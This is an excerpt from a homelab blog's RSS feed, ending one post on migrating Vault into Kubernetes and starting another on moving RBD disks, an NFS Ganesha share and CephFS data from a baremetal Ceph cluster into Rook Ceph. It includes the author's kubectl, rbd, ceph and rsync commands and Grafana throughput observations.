</span></span><span style="display:flex;"><span>      <span style="color:#f92672">status</span>: <span style="color:#e6db74">&#34;True&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Ready&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">wait_timeout</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">vault_pod_list</span>
</span></span></code></pre></div><p>This task uses the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/k8s_info_module.html#ansible-collections-kubernetes-core-k8s-info-module">Kubernetes Ansible collection</a>
to have Ansible wait for the Vault Pod to be in <code>Ready</code> state. I&rsquo;m also saving the list
of discovered Vault Pods in a variable for later use. This task would only wait
for the Vault Pod on the host currently being updated, via the field selector.</p>
<p>Short aside: This also taught me that I could do the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get pods -A --field-selector <span style="color:#e6db74">&#34;spec.nodeName=mynode&#34;</span>
</span></span></code></pre></div><p>Instead of <code>kubectl get pods -A -o wide | grep mynode</code>. After over a year of
running Kubernetes in my Homelab. &#x1f926;</p>
<p>But let&rsquo;s move on. I now had the name of the Vault Pod on the rebooted host
in the <code>vault_pod_list</code> variable, which allowed me to output a command line
I could copy+paste to unseal the Vault instance:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unseal vault prompt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">echo</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prompt</span>: <span style="color:#e6db74">&#34;Please unseal vault: kubectl exec -it -n vault {{ vault_pod_list.resources[0].metadata.name }} -- vault operator unseal&#34;</span>
</span></span></code></pre></div><p>This is a pretty convenient way to integrate manual operations into an Ansible
play and works quite well. I see this prompt, copy the line and unseal the Pod,
and then I just hit <code>&lt;Return&gt;</code> in the shell where Ansible is running and the
play will continue.</p>
<h2 id="switching-the-certs-over-to-the-new-vaults-ca">Switching the certs over to the new Vault&rsquo;s CA</h2>
<p>If you remember from further up (and I won&rsquo;t be mad if you don&rsquo;t, looking at the
length of this post&hellip;), I was using the baremetal Vault instance to generate the
certificates for the new Vault instance. But this also meant that those certs
were relying on the old Vault&rsquo;s CA.</p>
<p>The first step was to update the CA cert in the k8s Secret used for the
VaultDynamicSecret for the Vault certificate, which I did by changing the
line in my <code>values.yaml</code> file fetching the CA:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>{{- <span style="color:#ae81ff">exec &#34;curl&#34; (list &#34;-k&#34; &#34;https://newvault:8200/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>This did not have any direct effect on anything. The certificate Secret has a
refresh interval of 4000 hours, so it won&rsquo;t be recreated anytime soon. At the same
time, Vault won&rsquo;t automatically reload a new CA either, so everything was fine.</p>
<p>Then I went into the VaultDynamicSecret and updated the Vault URL from the old
to the new Vault. This regenerated the Vault certificates. But again, Vault
itself doesn&rsquo;t react to that, so Vault was still up and running without issue.</p>
<p>Then I sent <code>SIGHUP</code> to each Vault instance in turn, which triggered a configuration
reload, including picking up the fresh certificates.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl exec -it -n vault vault-0 -- sh
</span></span><span style="display:flex;"><span>kill -SIGHUP <span style="color:#66d9ef">$(</span>pidof vault<span style="color:#66d9ef">)</span>
</span></span></code></pre></div><p>And that&rsquo;s it. I added annotations to a couple of ExternalSecrets to trigger
refreshes to make sure it all worked, and it did: external-secrets successfully
got the secrets from the new k8s Vault instance.</p>
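<p>The annotation trick is, if I remember correctly, the <code>force-sync</code> annotation from
the external-secrets docs; roughly like this, with placeholder names:</p>
<pre tabindex="0"><code># Force external-secrets to reconcile an ExternalSecret right away by
# setting the force-sync annotation to a changing value.
kubectl annotate externalsecret -n some-namespace some-externalsecret \
  force-sync=$(date +%s) --overwrite
</code></pre>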
<p>This was quite a lot more work than I thought, but it was also the second-to-last
part of the migration.
Now, the only thing still missing is to migrate the control plane off of the
VMs on my extension host and onto the three Raspberry Pi 4 which previously served as
controller nodes and are now empty, thanks to the baremetal Vault having been shut down.</p>
<p>But it&rsquo;s Monday evening now, and the controller migration is more a weekend task,
because it also includes moving the MONs of the Rook Ceph cluster, and that
will need some full cluster restarts.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 23: Shutdown of the Baremetal Ceph Cluster</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/</link>
      <pubDate>Sat, 29 Mar 2025 15:10:33 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/</guid>
      <description>Migration of the last remaining data and shutdown of my baremetal Ceph cluster</description>
      <content:encoded><![CDATA[<p>Wherein I migrate the last remaining data off of my baremetal Ceph cluster and
shut it down.</p>
<p>This is part 23 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I set up my baremetal Ceph cluster back in March of 2021, driven by how much
I liked the idea of large pools of disks I could use to provide S3 storage, block
devices and a POSIX-compatible filesystem. Since then, it has served me rather
well, and I&rsquo;ve been using it to provide S3 buckets and volumes for my Nomad
cluster. Given how happy I was with it, I also wanted to continue using it for
my Kubernetes cluster.</p>
<p>To this end, I was quite happy to discover the <a href="https://rook.io/">Rook Ceph</a>
project, which at its core implements a Kubernetes operator capable of
orchestrating an entire Ceph cluster. I&rsquo;ve described my setup in far more
detail in <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">this blog post</a>.</p>
<p>In the original baremetal cluster, I had three nodes, each with one HDD and one
SSD for storage, running all Ceph daemons besides the MONs, which ran on my
cluster controller Pi 4. I&rsquo;ve run the cluster with replicated pools at a
replication factor of two and a minimum size of one, so I could reboot a node
without all writes to the cluster having to stop, e.g. during maintenance.
I was lucky in that all of my data also comfortably fit on only two hosts
with a 1 TB SSD and a 4 TB HDD. So when the time to start the migration came,
I took my emergency replacement HDD and SSD and put them into my old Homeserver.
A VM running on that server became the first OSD node in the k8s cluster. I also
drained the OSDs and other daemons from one of the original baremetal nodes and
moved that into the k8s cluster as well. So I still ended up with 2x replication,
just with two clusters of two storage nodes each.</p>
<p>After I was finally done migrating all of my services from Nomad to Kubernetes,
I still had the following datasets on the baremetal Ceph cluster:</p>
<ol>
<li>An NFS Ganesha cluster serving the boot partitions of all of my netbooting hosts</li>
<li>A data dump CephFS volume that contained just some random data, like old slides and
digital notes from my University days</li>
<li>The root disks of all of my netbooting nodes, in the form of 50 GB RBDs</li>
</ol>
<p>In the rest of this post, I will go over how I migrated all three of those, shut
down the old baremetal cluster and migrated its two physical nodes into the
Rook Ceph cluster.</p>
<h2 id="root-disk-migration">Root disk migration</h2>
<p>The first step was migrating the root disks of my netbooting hosts. Those hosts
are eight Raspberry Pi CM4 and an x86 SBC, all without any local storage.
Each of them uses a 50 GB RBD as its root disk. These RBDs needed to be migrated
over to the new Rook Ceph cluster, and the hosts&rsquo; configuration changed to contact the
Rook MON daemons.
If you&rsquo;re interested in the details of my netboot setup, have a look at <a href="https://blog.mei-home.net/tags/netboot/">this series of posts</a>.</p>
<p>As these RBDs were block devices, I was initially at a bit of a loss when
thinking about migrating them over. Sure, those nine netbooters were as cattle-ish
as it got, so I could just completely recreate them - but the setup of fresh hosts
is the weakest part of my Homelab setup. It would have taken me a couple of evenings.</p>
<p>Luckily, <a href="https://www.reddit.com/r/ceph/comments/gi7jlz/ceph_snapshot_transfer/">Reddit to the rescue</a>.
It turns out that the <a href="https://docs.ceph.com/en/reef/man/8/rbd/">rbd tool</a> can
both import and export RBD images, including via stdin/stdout.</p>
<p>I did the migration node by node, and because at this point all of the nodes
were in the k8s cluster, I had to start with draining them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain --delete-emptydir-data<span style="color:#f92672">=</span>true --force<span style="color:#f92672">=</span>true --ignore-daemonsets<span style="color:#f92672">=</span>true examplehost
</span></span></code></pre></div><p>Then the node also needs to be shut down, because migrating the disk from one
Ceph cluster to another really isn&rsquo;t going to work online.
Once the host was safely shut down, I could do the actual copy operation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rbd --id admin export --no-progress hostdisks/examplehost - | rbd -c ceph-rook.conf -k client.admin.key --id admin import - hostdisks/examplehost
</span></span></code></pre></div><p>The first <code>rbd</code> invocation does not receive an explicit Ceph config file, so it
uses the default <code>/etc/ceph/ceph.conf</code> file, which at this point was still the
config for the baremetal cluster. The <code>hostdisks</code> pool was the destination pool
for the copy operation.
One issue worth noting here is that the <code>rbd</code> tool as provided by the <a href="https://github.com/rook/kubectl-rook-ceph">Rook kubectl plugin</a>
did not work as the receiving command. I was immediately getting broken
pipe errors. Probably something to do with how it is implemented as a kubectl plugin.</p>
<p>With the copy done, which took about ten minutes per disk, I then had to adapt
the configuration of the MON IPs in the host&rsquo;s kernel command line. For one of
my Pis, it looks something like this:</p>
<pre tabindex="0"><code>console=serial0,115200 dwc_otg.lpm_enable=0 console=tty1 root=LABEL=writable rootfstype=ext4 rootwait fixrtc  boot=rbd rbdroot=300.300.300.310,300.300.300.311,300.300.300.312:cephuser:pw:hostdisks:examplehost::_netdev,noatime hllogserver=logs.internal:12345
</code></pre><p>The list of three IPs after <code>rbdroot=</code> contains the MONs used. Then I also had
to change the Ceph key in the <code>pw</code> field.</p>
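<p>The key itself can be read out of the Rook cluster, for example via the toolbox
Pod, assuming the standard <code>rook-ceph-tools</code> deployment in the <code>rook-ceph</code> namespace
is present (adjust the client name if the netbooters use a dedicated Ceph user):</p>
<pre tabindex="0"><code># Read the key for a Ceph client from the Rook cluster via the toolbox Pod.
kubectl -n rook-ceph exec deploy/rook-ceph-tools -- ceph auth get-key client.admin
</code></pre>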
<p>And then I could reboot the host. And what can I say: all nine hosts went
through without a single issue. I had expected at least some sort of problem,
but I was seemingly pretty well prepared.</p>
<p>Before going to the next migration, let&rsquo;s have a look at some Ceph metrics for
this copy operation. First the throughput:</p>
<p><figure>
    <img loading="lazy" src="disks-throughput.png"
         alt="A screenshot of a Grafana time series plot. It shows roughly three hours worth of data, time on the X axis and throughput in MB on the Y axis. For the quiet periods, the throughput is around 1-2 MB/s. But there are eight &#39;hills&#39; in the plot, each about ten minutes long, which show a throughput between 30 and 50 MB/s."/> <figcaption>
            <p>Throughput graph for the receiving Ceph cluster for eight of the disk migrations.</p>
        </figcaption>
</figure>

Interesting things here are the approximately ten minutes of duration for each
of the disk migrations and the fact that the maximum throughput reached is around
50 MB/s. It&rsquo;s worth noting that, in contrast to a <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">previous copy operation</a>,
the target disks were SSDs this time around. So 50 MB/s sounds a bit too little,
doesn&rsquo;t it? Well, yes and no. &#x1f642;
This time I made another little mistake I had discussed previously, namely I
ran the copy operation on my C&amp;C host. And that means that the data needs to
go through my router, because the Ceph cluster and the C&amp;C host live on different
VLANs and subnets.</p>
<p>This might already be part of the explanation. Let&rsquo;s look at the throughput
on my router next:
<figure>
    <img loading="lazy" src="network-router.png"
         alt="A screenshot of a Grafana time series plot. It shows the network utilization Mb/s for the network interface both the Ceph hosts and the C&amp;C host hang off of. Like the previous throughput plot, it shows 8 load phases. In each of them, about 700 - 800 Mb/s come in and go out again."/> <figcaption>
            <p>Network graphs for the NIC both the Ceph hosts and the C&amp;C host hang off of.</p>
        </figcaption>
</figure>

While yes, this doesn&rsquo;t look like the 1 GbE interface is saturated, there might
be some other kind of issue? Meaning this might actually be the max it can do
for this particular routing scenario? Then again, the CPU really should be capable
of routing 1 Gbps.</p>
<p>Next, let&rsquo;s have a quick look at the IO utilization on the two receiving hosts:
<figure>
    <img loading="lazy" src="io-hostdisks.png"
         alt="A screenshot of a Grafana time series plot. It shows the IO utilization in percent of two hosts, each represented by its own plot. Again, the eight copy operations are clearly visible as hills in the plots. One host goes up to 20%, while the other goes up to almost 60%. Neither of them come close to 100% IO utilization."/> <figcaption>
            <p>IO utilization of the two receiving hosts.</p>
        </figcaption>
</figure>
</p>
<p>So clearly, this time around the IO utilization is not the problem. Neither is
the CPU:
<figure>
    <img loading="lazy" src="hostdisks-cpu.png"
         alt="A screenshot of a Grafana time series plot. The two hosts shown have an idle CPU percentage of 95% and 90% respectively. The eight copy operations are again clearly visible as hills in the plots. For one of the hosts, the idle percentage doesn&#39;t move much, only from 95% to 90%. For the other host the impact is more visible, moving the idle percentage down to 65% to 70%. "/> <figcaption>
            <p>CPU idle percentage of the two receiving hosts.</p>
        </figcaption>
</figure>

Both hosts still have a lot of headroom here. But I did find this as well:
<figure>
    <img loading="lazy" src="candc-cpu.png"
         alt="A screenshot of a Grafana time series plot. This time only one host&#39;s CPU idle percentage is shown. It is 97% idle at rest, but deep troughs down to around 55% idle are visible for the eight copy operations. "/> <figcaption>
            <p>CPU idle percentage of the C&amp;C host doing the rbd import/export.</p>
        </figcaption>
</figure>
</p>
<p>This <em>might</em> be the explanation for why I&rsquo;m reaching no more than 50 MB/s throughput
even though this is a copy from SSD to SSD. The C&amp;C host is a pretty weak one:
it has an AMD Embedded G-Series GX-412TC CPU, a very low-powered part. Normally
that&rsquo;s more than enough, as it doesn&rsquo;t need to do anything compute heavy. But this
workload might just be too much for it. I&rsquo;m not familiar with the <code>rbd</code> import/export
implementation, but looking at the plot, I could theorize: this looks like two of the four cores
being fully pegged, possibly one by the <code>rbd export</code> and one by the <code>rbd import</code>.
And the roughly 50 MB/s is simply all it can really do?</p>
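<p>For reference, the kind of piped copy I mean looks roughly like this; the config
paths and image names are placeholders, not my exact invocation:</p>
<pre tabindex="0"><code># Read the image from the old cluster and stream it straight into the new one
rbd export --conf /etc/ceph/old-cluster.conf hostdisks/examplehost - \
  | rbd import --conf /etc/ceph/new-cluster.conf - hostdisks/examplehost
</code></pre>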
<p>I think I need to dig deeper into this at some point, running some proper testing
of what I can really do when it comes to reads and writes in Ceph.</p>
<p>That&rsquo;s it for the disk copying. Let&rsquo;s move on to the second element of my netboot
setup, the boot partitions sitting on NFS.</p>
<h2 id="nfs-setup">NFS setup</h2>
<p>For the boot partitions, I needed to come up with something special, because those
need to be &ldquo;shared&rdquo; between the host they belong to and my cluster master, which
runs a TFTP server. That&rsquo;s because to mount the RBD root disks, I need a kernel
running, and that kernel needs to come from somewhere. Plus, the hosts should
all be able to independently run updates, or even different operating systems.
So I couldn&rsquo;t just share one boot partition between all of them.</p>
<p>For this, again, I&rsquo;m using my Ceph cluster and the integrated support for
<a href="https://github.com/nfs-ganesha/nfs-ganesha">NFS Ganesha</a>.</p>
<p>I configured the cluster with the <a href="https://rook.io/docs/rook/latest-release/CRDs/ceph-nfs-crd/">Rook NFS CRD</a>,
looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephNFS</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-nfs</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Settings for the NFS server</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">active</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#e6db74">&#34;250m&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-cluster-critical&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">NIV_INFO</span>
</span></span></code></pre></div><p>This creates a single NFS pod in the cluster. If I read the docs right,
NFS doesn&rsquo;t do HA very well, so there&rsquo;s not much use in having more than one.
One of the things Ceph does when an NFS cluster is set up is to create the
<code>.nfs</code> pool as a location for some metadata. This in turn causes the Ceph
PG autoscaler to stop working, with this warning:</p>
<pre tabindex="0"><code>debug 2025-03-10T13:54:45.313+0000 7fa1ad391640  0 [pg_autoscaler WARNING root] pool 6 contains an overlapping root -3... skipping scaling
</code></pre><p>I&rsquo;ve written about the last time I encountered this issue <a href="https://blog.mei-home.net/posts/ceph-rook-crush-rules/">here</a>,
so suffice it to say that the root cause is that the new pool is created with a
generic CRUSH rule whose root overlaps with the roots of other, more specific rules.
It&rsquo;s fixed by applying a more specific rule to the pool.</p>
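<p>The fix looks roughly like this; the rule name is mine, and whether you pin the
pool to <code>ssd</code> or <code>hdd</code> obviously depends on your setup:</p>
<pre tabindex="0"><code># Create a device-class specific replicated rule and assign it to the .nfs pool
ceph osd crush rule create-replicated replicated-ssd default host ssd
ceph osd pool set .nfs crush_rule replicated-ssd
</code></pre>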
<p>Because I wanted to use the NFS cluster outside k8s, I also introduced this
Service:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-rook-external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">nfs.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;300.300.300.102&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-nfs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ceph_nfs</span>: <span style="color:#ae81ff">hl-nfs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>: <span style="color:#ae81ff">a</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2049</span>
</span></span></code></pre></div><p>This way I don&rsquo;t have to hard-code a specific host into the <code>/etc/fstab</code> of
my hosts, and NFS is perfectly happy to resolve the NFS server&rsquo;s IP via DNS.</p>
<p>Next is the NFS share itself. These shares can be backed by either a CephFS
subvolume or an S3 bucket. But the S3 bucket backend has severe restrictions.
I tried it once, and found that e.g. Git repos on such an NFS share don&rsquo;t work,
with Git commands returning <code>Not Implemented</code> errors. So I created a CephFS
subvolume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume create my-cephfs my-share
</span></span></code></pre></div><p>Then comes the creation of the NFS share:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph nfs export create cephfs --cluster-id hl-nfs --pseudo-path /my-share-path --fsname my-cephfs --path /volumes/_nogroup/my-share/UUID-HERE --client_addr 300.300.300.0/24 --client_addr 300.300.315.0/24
</span></span></code></pre></div><p>The <code>--path</code> parameter can be fetched via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph fs subvolume getpath my-cephfs my-share
</span></span></code></pre></div><p>One thing I&rsquo;m a bit sad about is that I had to use the command line to create
those two objects, the subvolume and the NFS share, instead of being able to use
CRDs in the k8s cluster.</p>
<p>The resulting NFS share definition, as fetched with <code>ceph nfs export ls hl-nfs --detailed</code>,
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>[
</span></span><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;access_type&#34;</span>: <span style="color:#e6db74">&#34;none&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clients&#34;</span>: [
</span></span><span style="display:flex;"><span>      {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;access_type&#34;</span>: <span style="color:#e6db74">&#34;rw&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;addresses&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;300.300.300.0/24&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;300.300.315.0/24&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;squash&#34;</span>: <span style="color:#e6db74">&#34;None&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;cluster_id&#34;</span>: <span style="color:#e6db74">&#34;hl-nfs&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;export_id&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;fsal&#34;</span>: {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;fs_name&#34;</span>: <span style="color:#e6db74">&#34;my-cephfs&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;CEPH&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;user_id&#34;</span>: <span style="color:#e6db74">&#34;nfs.hl-nfs.1&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/volumes/_nogroup/my-share/UUID-HERE&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;protocols&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">4</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;pseudo&#34;</span>: <span style="color:#e6db74">&#34;/my-share-path&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;security_label&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;squash&#34;</span>: <span style="color:#e6db74">&#34;None&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;transports&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;TCP&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>The end effect of all of this is an NFS share which can be mounted like this:</p>
<pre tabindex="0"><code>nfs.example.com:/my-share-path /mnt/example nfs defaults,timeo=900,_netdev 0 0
</code></pre><p>One small note on the migration: Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/posix/mount_module.html">mount module</a>
does not seem to automatically remount when a mount definition is changed. That is
likely a good idea, but it meant that I had to execute these commands on all of my
netbooters:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;host1:host2:host3&#34;</span> -a <span style="color:#e6db74">&#34;umount /boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;host1:host2:host3&#34;</span> -a <span style="color:#e6db74">&#34;mount /boot/firmware&#34;</span>
</span></span></code></pre></div><p>After that, they all had the right NFS share mounted and I was one step closer
to shutting down the baremetal cluster.</p>
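<p>For completeness, the mount itself is defined by an Ansible task along these lines;
the paths and variables are illustrative rather than my exact playbook:</p>
<pre tabindex="0"><code>- name: Mount the boot partition from the NFS share
  ansible.posix.mount:
    path: /boot/firmware
    src: &#34;nfs.example.com:/my-share-path/{{ inventory_hostname }}&#34;
    fstype: nfs
    opts: defaults,timeo=900,_netdev
    state: mounted
</code></pre>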
<h2 id="copying-my-warehouse-volume-over">Copying my warehouse volume over</h2>
<p>As I&rsquo;ve mentioned above, I&rsquo;ve got a &ldquo;random bunch of stuff&rdquo; CephFS subvolume
that is mounted on my desktop. It really contains exactly that: A random
assortment of data. Copies of old University slides and projects, backups for
my OpenWRT WiFi router&rsquo;s config and some old database dumps from services I&rsquo;m
no longer running. Overall, it&rsquo;s about 129 GB, so not too much data, in contrast
to my Linux ISO collection for example.</p>
<p>Here&rsquo;s the rsync command and its output:</p>
<pre tabindex="0"><code>rsync -av --info=progress2 --info=name0 /mnt/tempt1/* /mnt/temp2/
sending incremental file list
129,648,120,620  99%   41.86MB/s    0:49:14 (xfr#1415, to-chk=0/1537)

sent 129,679,927,316 bytes  received 27,564 bytes  43,892,352.30 bytes/sec
total size is 129,654,775,448  speedup is 1.00
